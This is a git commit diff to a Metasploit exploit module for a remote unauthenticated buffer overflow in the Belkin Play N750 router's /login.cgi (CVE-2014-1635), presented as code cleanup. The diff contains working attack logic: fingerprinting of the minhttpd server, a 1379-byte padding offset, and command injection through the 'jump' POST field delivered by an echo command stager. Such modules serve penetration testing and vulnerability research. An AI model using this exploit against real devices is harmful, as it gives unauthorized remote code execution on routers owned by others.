Do code cleanup

jvazquez-r7 · jvazquez-r7 · commit 5499b68e02b2 · 2015-03-22T01:58:32.000-05:00
diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb
@@ -6,25 +6,25 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ManualRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Belkin login.cgi Buffer Overflow (minhttpd)',
+      'Name'           => 'Belkin Play N750 login.cgi Buffer Overflow',
       'Description'    => %q{
-        This module exploits a remote buffer overflow vulnerability on several Belkin routers.
-        The vulnerability exists in the handling of HTTP queries to the login.cgi with
-        long jump values. The vulnerability can be exploitable without authentication.
-        This module was tested in an emulated environment only. Several Belkin routers with
-        firmware 1.10.16.m are affected.
+        This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB
+        Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling
+        of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing
+        remote unauthenticated attackers to execute arbitrary code. This module was tested in
+        an emulated environment, using the version 1.10.16.m of the firmwarey.
       },
       'Author'         =>
         [
-          'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and initial Metasploit module (telnetd)
-          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module with echo stager
+          'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and msf module (telnetd)
+          'Michael Messner <devnull[at]s3cur1ty.de>', # msf module with echo stager
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => ['linux'],
@@ -35,33 +35,39 @@ def initialize(info = {})
           ['EDB', '35184'],
           ['BID', '70977'],
           ['OSVDB', '114345'],
-          ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'], #advisory
-          ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831'] #vendor site with update
+          ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'],
+          ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831']
         ],
       'Targets'        =>
         [
           [ 'Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103,  firmware 1.10.16.m',
             {
-              'Offset'      => 1379,
+              'Offset' => 1379,
             }
           ]
         ],
-      'DefaultOptions' => {
-        'RPORT'      => 8080
-      },
-      'DisclosureDate'  => 'May 09 2014',
-      'DefaultTarget'   => 0))
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8080
+        },
+      'DisclosureDate' => 'May 09 2014',
+      'DefaultTarget'  => 0))
       deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
     begin
       res = send_request_cgi({
         'method' => 'GET',
-        'uri' => "/"
+        'uri' => '/'
       })
 
-      if res && [200, 301, 302].include?(res.code) and res.headers["Server"] and res.headers["Server"] =~ /minhttpd/ and res.body =~ /u_errpaswd/
+      if res &&
+        [200, 301, 302].include?(res.code) &&
+        res.headers['Server'] &&
+        res.headers['Server'] =~ /minhttpd/ &&
+        res.body =~ /u_errpaswd/
+
         return Exploit::CheckCode::Detected
       end
     rescue ::Rex::ConnectionError
@@ -82,26 +88,25 @@ def exploit
     execute_cmdstager(
       :flavor  => :echo,
       :linemax => 200,
-      :concat_operator => " ; "
+      :concat_operator => ' ; '
     )
   end
 
   def prepare_shellcode(cmd)
-    shellcode = rand_text_alpha_upper(target['Offset'])                  # padding
-    shellcode << "e" << cmd
+    shellcode = rand_text_alpha_upper(target['Offset'])
+    shellcode << 'e' << cmd
     shellcode << "\n\n"
   end
 
   def execute_command(cmd, opts)
     shellcode = prepare_shellcode(cmd)
     begin
       res = send_request_cgi({
-        'method' => 'POST',
-        'uri' => "/login.cgi",
-        'encode_params' => true,
+        'method'    => 'POST',
+        'uri'       => '/login.cgi',
         'vars_post' => {
-          'GO'      => '',
-          'jump'    => shellcode,
+          'GO'   => '',
+          'jump' => shellcode,
         }
       })
       return res
